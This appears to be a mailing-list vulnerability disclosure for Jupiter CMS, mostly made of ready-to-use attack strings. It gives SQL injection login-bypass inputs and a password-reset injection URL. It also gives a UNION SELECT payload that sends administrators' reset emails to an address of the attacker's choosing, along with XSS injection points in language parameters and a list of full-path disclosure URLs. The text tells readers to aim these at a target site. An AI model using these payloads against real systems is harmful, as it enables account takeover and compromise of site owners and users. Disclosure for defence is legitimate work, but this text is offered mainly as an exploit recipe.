|
|
Hello,,=0D
=0D
=0D
Jupiter CMS Sql injections ,full path and xss vulnerabilities=0D
=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D
Email Address : security@soqor.net=0D
=0D
=0D
if magic_quotes_gpc = off=0D
login with=0D
user name : =0D
' or id=1/*=0D
or=0D
' or authorization = 4/*=0D
=0D
you will be loged in with full permission=0D
-------------------------=0D
index.php?n=modules/register&a=3&d=3&key='%20or%20id=1/*=0D
You will be able to change the password for any user .. know his id and put it in the url.=0D
=0D
--=0D
or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators=0D
=0D
=0D
=0D
put the user name value=0D
Change security@soqor.net to your email=0D
' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,calendarbday,status,multikey,actime from users where id=1or authorization=4/*=0D
/********************************************/=0D
=0D
Upload any picture to their gallery=0D
=0D
modules/galleryuploadfunction.php=0D
=0D
picture path will be =0D
gallery/albums/public/name.ext=0D
/********************************************/=0D
=0D
xss (Cross site scripting)=0D
=0D
modules/blocks.php?is_webmaster=2&language[Admin%20name]==0D
modules/blocks.php?is_webmaster=2&language[Admin%20back]==0D
=0D
modules/register.php?is_guest=1&language[Register%20title]==0D
modules/register.php?is_guest=1&language[Register%20title2]==0D
=0D
modules/mass-email.php?language[Mass-Email%20form%20title]==0D
modules/mass-email.php?language[Mass-Email%20form%20desc]==0D
modules/mass-email.php?language[Mass-Email%20form%20desc2]==0D
change the value for language[Mass-Email%20form%20desc(2-4)]=0D
=0D
modules/register.php?is_guest=1&a=3&language[Forgotten%20title]==0D
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc]==0D
modules/register.php?is_guest=1&a=3&language[Forgotten%20desc2]==0D
change the var value for language[Forgotten%20desc(2 - 5)]=0D
=0D
=0D
modules/search.php?language[Search%20view%20desc]==0D
modules/search.php?language[Search%20view%20desc2]==0D
Change the value for language[Search%20view%20desc(2-8)]=0D
=0D
/********************************************/=0D
=0D
Full path=0D
includes/functions.php=0D
=0D
modules/register.php?is_guest=1=0D
modules/online.php=0D
modules/poll.php=0D
modules/panel.php=0D
modules/pm.php=0D
modules/news.php=0D
modules/templates_change.php=0D
modules/users.php=0D
modules/misc.php?a=1&is_webmaster=1=0D
modules/masspm.php=0D
modules/mass-email.php?subject_choice=1&message_choice=1&a=1=0D
modules/main-nav.php=0D
modules/login.php=0D
modules/layout.php?is_webmaster=2=0D
modules/hq.php=0D
modules/forum.php=0D
modules/forum-admin.php?n=modules/forum-admin&a=1=0D
modules/events.php=0D
modules/emoticons.php=0D
modules/download.php=0D
modules/blocks.php?is_webmaster=2=0D
modules/ban.php=0D
modules/badwords.php=0D
modules/ads.php=0D
modules/admin.php=0D
=0D
/********************************************/=0D
=0D
WwW.SoQoR.NeT